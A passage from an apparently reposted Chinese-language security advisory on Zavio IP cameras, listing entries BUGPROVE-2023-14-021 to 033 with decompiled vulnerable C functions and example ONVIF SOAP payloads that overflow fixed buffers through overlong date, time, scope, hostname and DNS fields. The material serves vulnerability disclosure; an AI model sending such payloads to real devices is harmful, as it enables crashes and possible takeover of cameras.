                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>AAAAAAAAAAAAAAAAAAA.......</UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-021

存在漏洞的代码如下:

参考BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">AAAAAAAAAAAAAAAAAAAAA..................</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>21</Hour>
                    <Minute>29</Minute>
                    <Second>55</Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-022

存在漏洞的代码如下:

参考 BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>AAAAAAAAAAAAAA.........</Hour>
                    <Minute>29</Minute>
                    <Second>55</Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-023

存在漏洞的代码如下:

参考 BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>12</Hour>
                    <Minute>AAAAAAAAAAAAAAAAAAAAAAA................................</Minute>
                    <Second>55</Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-024

存在漏洞的代码如下:

参考 BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>12</Hour>
                    <Minute>29</Minute>
                    <Second>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...................</Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-025

存在漏洞的代码如下:

参考 BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>12</Hour>
                    <Minute>29</Minute>
                    <Second></Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>AAAAAAAAAAAAAAAAAAAAAAA...........</Year>
                    <Month>3</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-026

存在漏洞的代码如下:

参考 BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>12</Hour>
                    <Minute>29</Minute>
                    <Second></Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>AAAAAAAAAAAAAAAAAAAAAA..............</Month>
                    <Day>7</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-027

存在漏洞的代码如下:

参考 BUGPROVE-2023-14-018.

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
            <DateTimeType>Manual</DateTimeType>
            <DaylightSavings>false</DaylightSavings>
            <TimeZone>
                <TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
            </TimeZone>
            <UTCDateTime>
                <Time xmlns="http://www.onvif.org/ver10/schema">
                    <Hour>12</Hour>
                    <Minute>29</Minute>
                    <Second></Second>
                </Time>
                <Date xmlns="http://www.onvif.org/ver10/schema">
                    <Year>2023</Year>
                    <Month>5</Month>
                    <Day>AAAAAAAAAAAAAAAAAA...........</Day>
                </Date>
            </UTCDateTime>
        </SetSystemDateAndTime>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-028

存在漏洞的代码如下:

void set_scope(char *param_1,char *param_2,int param_3)

{
  char *pcVar1;
  char *pcVar2;
  int iVar3;
  char *__dest;
  size_t sVar4;
  char cVar5;

  pcVar1 = (char *)key_value_given_by_user_fine(param_2,"Scopes",0);
  pcVar2 = strstr(param_2,pcVar1);
  pcVar2 = pcVar2 + 1;
  cVar5 = '\x14';
  while (pcVar1 != (char *)0x0) {
    iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/video_encoder",0x28);
    if ((((iVar3 == 0) ||
         (iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/audio_encoder",0x28), iVar3 == 0)) ||
        (iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/recording",0x24), iVar3 == 0)) ||
       (((iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/ptz",0x1e), iVar3 == 0 ||
         (iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/Profile/Streaming",0x27), iVar3 == 0)) ||
        (iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/hardware/",0x1f), iVar3 == 0)))) {
      free(pcVar1);
      notsupported(param_1,"ter:OperationProhibited","ter:ScopeOverwrite",
                   "Scope parameter overwrites fixed device scope setting, command rejected.");
      return;
    }
    iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/location/",0x1f);
    if (iVar3 == 0) {
      pcVar1 = pcVar1 + 0x1f;
      __dest = (char *)(param_3 + 0x697);
LAB_00014dd0:
      strcpy(__dest,pcVar1);
    }
    else {
      iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/name/",0x1b);
      if (iVar3 == 0) {
        pcVar1 = pcVar1 + 0x1b;

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
    <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
        <UsernameToken>
            <Username>admin</Username>
            <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
            <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
            <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
        </UsernameToken>
    </Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetScopes>
    <Scopes xmlns="onvif://www.onvif.org/name/">AAAAAAAAAAAAAAAAAA............</Scopes>
</SetScopes>

BUGPROVE-2023-14-029

存在漏洞的代码如下:

void add_scopes(char *param_1,undefined4 param_2,undefined4 param_3)

{
  int iVar1;
  char *pcVar2;
  undefined4 local_14;

  pcVar2 = param_1;
  local_14 = param_2;
  do {
    iVar1 = key_value_given_by_user_fine(local_14,"ScopeItem",&local_14);
    if (iVar1 == 0) {
      sprintf(param_1,
              "<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://www.w3.o rg/2003/05/soap-envelope\" xmlns:trt=\"http://www.onvif.org/ver10/media/wsdl\" xmlns:t ds=\"http://www.onvif.org/ver10/device/wsdl\" xmlns:tt=\"http://www.onvif.org/ver10/sc hema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xs=\"http://www.w 3.org/2001/XMLSchema\"><soap:Body>%s</soap:Body></soap:Envelope>"
              ,"<tds:AddScopesResponse></tds:AddScopesResponse>");
      return;
    }
    iVar1 = messwithscopes(param_1,iVar1,param_3,1,pcVar2);
  } while (iVar1 != 0);
  return;
}

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <AddScopes>AAAAAAAAAAAAAAA.............</AddScopes>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-030

存在漏洞的代码如下:

void remove_scopes(char *param_1,undefined4 param_2,int param_3)

{
  int *piVar1;
  char *pcVar2;
  int iVar3;
  int iVar4;
  char *pcVar5;
  int iVar6;
  int iVar7;
  int iVar8;
  char *pcVar9;
  char acStack8232 [8196];

  memset(acStack8232,0,0x2000);
  pcVar2 = (char *)key_value_given_by_user_fine(param_2,"ScopeItem",0);
  iVar7 = 0;
LAB_00014aa8:
  if (pcVar2 == (char *)0x0) {
    sprintf(param_1,"<tds:RemoveScopesResponse>%s</tds:RemoveScopesResponse>",acStack8232);
    return;
  }
  iVar6 = 0;
  iVar8 = param_3;
  do {
    piVar1 = (int *)(iVar8 + 0x700);
    iVar8 = iVar8 + 0x84;
    if (*piVar1 == 1) {
      pcVar9 = (char *)(param_3 + iVar6 * 0x84 + 0x704);
      iVar3 = strcmp(pcVar9,pcVar2);
      if (iVar3 == 0) break;
    }
    iVar3 = strncmp(pcVar2,"onvif://www.onvif.org/type/video_encoder",0x28);
    iVar6 = iVar6 + 1;
    if (iVar3 == 0) {
LAB_00014a48:
      free(pcVar2);
      pcVar2 = "ter:FixedScope";
      pcVar9 = "ter:OperationProhibited";
      pcVar5 = "Trying to Remove fixed scope parameter, command rejected.";
      goto LAB_00014a84;
    }
    iVar3 = strncmp(pcVar2,"onvif://www.onvif.org/type/audio_encoder",0x28);
    iVar4 = strncmp(pcVar2,"onvif://www.onvif.org/type/ptz",0x1e);
    if ((iVar3 == 0 || iVar4 == 0) ||
       (iVar3 = strncmp(pcVar2,"onvif://www.onvif.org/hardware/",0x1f), iVar3 == 0))
    goto LAB_00014a48;
    if (iVar6 == 0x14) goto LAB_00014a6c;
  } while( true );

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <RemoveScopes>AAAAAAAAAAAAAAAA..........</RemoveScopes>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-031

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1"
            xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password
                    Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">
                    sVIn3t8kC5XqSCgf2ae7jJqhs/M=</Password>
                <Nonce
                    EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">
                    iDAloMnFT0CHyXsPmtq0l1oCAAAAAA==</Nonce>
                <Created
                    xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                    1970-04-21T02:34:51.939Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"><GetNetworkInterfaces
            xmlns="http://www.onvif.org/ver10/device/wsdl" />AAAAAAAAAAAAAAAA............</s:Body>
</s:Envelope>

BUGPROVE-2023-14-032

存在漏洞的代码如下:
void FUN_0001599c(char *param_1,undefined4 param_2,int param_3)

{
  char acStack1048 [1024];

  memset(acStack1048,0,0x400);
  sprintf(acStack1048,"/cgi-bin/admin/param?action=update&%s=%s","General.Network.HostName",param_2)
  ;
  FUN_0001d220(acStack1048,*(undefined2 *)(param_3 + 0x122e));
  FUN_0001d27c(param_2);
  sprintf(param_1,
          "<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://www.w3.org/2 003/05/soap-envelope\" xmlns:trt=\"http://www.onvif.org/ver10/media/wsdl\" xmlns:tds=\"htt p://www.onvif.org/ver10/device/wsdl\" xmlns:tt=\"http://www.onvif.org/ver10/schema\" xmlns :xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xs=\"http://www.w3.org/2001/XMLSc hema\"><soap:Body>%s</soap:Body></soap:Envelope>"
          ,"<tds:SetHostnameResponse></tds:SetHostnameResponse>");
  return;
}

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">BKH8Bi1D5C/KScBE6amTEbjDlUE=</Password>
                <Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0lyUAAAAAAA==</Nonce>
                <Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T07:37:37.652Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetHostname xmlns="http://www.onvif.org/ver10/device/wsdl">
            <Name>AAAAAAAAAAAAAAAAAAAAAA................</Name>
        </SetHostname>
    </s:Body>
</s:Envelope>

BUGPROVE-2023-14-033

存在漏洞的代码如下:

 iVar1 = strcmp(param_3,"SetDNS");
    if (iVar1 == 0) {
      memset(dnsmanual,0,0x200);
      memset(acStack440,0,0x40);
      memset(fromdhcp,0,0x40);
      memset(local_b0,0,0x40);
      memset(domain,0,0x100);
      lookup_field_xml(document,&DAT_000332f4,fromdhcp);
      iVar6 = lookup_field_xml(document,"DNSManual",dnsmanual);
      iVar1 = lookup_field_xml(document,"SearchDomain",domain);
      if (iVar1 != 0) {
        memset((char *)(param_4 + 0x597),0,0x100);
        strcpy((char *)(param_4 + 0x597),domain);

示例负载如下:

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
    <s:Header>
        <Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
            <UsernameToken>
                <Username>admin</Username>
                <Password
                    Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">
                    OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
                <Nonce
                    EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">
                    iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
                <Created
                    xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                    1970-04-15T08:28:59.557Z</Created>
            </UsernameToken>
        </Security>
    </s:Header>
    <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
            <FromDHCP>false</FromDHCP>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">192.168.1.254</IPv4Address>
                AAAAAAAAAAAAAAAAAAAAAAA................
            </DNSManual>
            <DNSManual>
                <Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
                <IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
            </DNSManual>
        </SetDNS>
    </s:Body>
</s:Envelope>

参与评论

0 / 200

全部评论 0

暂无人评论
文章目录

关于 Zavio IP 摄像头

受影响的产品

产品网址

摘要

详细信息

BUGPROVE-2023-14-001 后授权命令注入,涉及多个Zavio IP 摄像头

1) 请求处理

2) 在字段中存储由攻击者控制的数据

3) 发送HTTP请求到param.cgi

4) param CGI 处理新请求

5)攻击者控制的数据保存在 param

6) 检查参数

7 ) 命令注入

BUGPROVE-2023-14-002 预授权缓冲区溢出,涉及WS-Security用户名处理。

BUGPROVE-2023-14-003 Pre-Auth Buffer Overflow with WS-Security Password processing

BUGPROVE-2023-14-004 使用 WS 安全随机数处理的预身份验证缓冲区溢出

BUGPROVE-2023-14-005 使用 WS 安全性创建的预身份验证缓冲区溢出处理

BUGPROVE-2023-14-006 使用 XML 元素处理的预身份验证缓冲区溢出

BUGPROVE-2023-14-007 已创建(有效用户名)处理的预身份验证缓冲区溢出

BUGPROVE-2023-14-008 使用 xmlns 处理的预身份验证缓冲区溢出

一系列身份验证后漏洞

BUGPROVE-2023-14-009

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-010

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-011

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-012

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-013

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-014

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-015

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-016

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-017

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-018

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-019

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-020

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-021

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-022

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-023

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-024

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-025

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-026

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-027

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-028

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-029

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-030

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-031

示例负载如下:

BUGPROVE-2023-14-032

存在漏洞的代码如下:

示例负载如下:

BUGPROVE-2023-14-033

存在漏洞的代码如下:

示例负载如下:

投稿
签到
联系我们
关于我们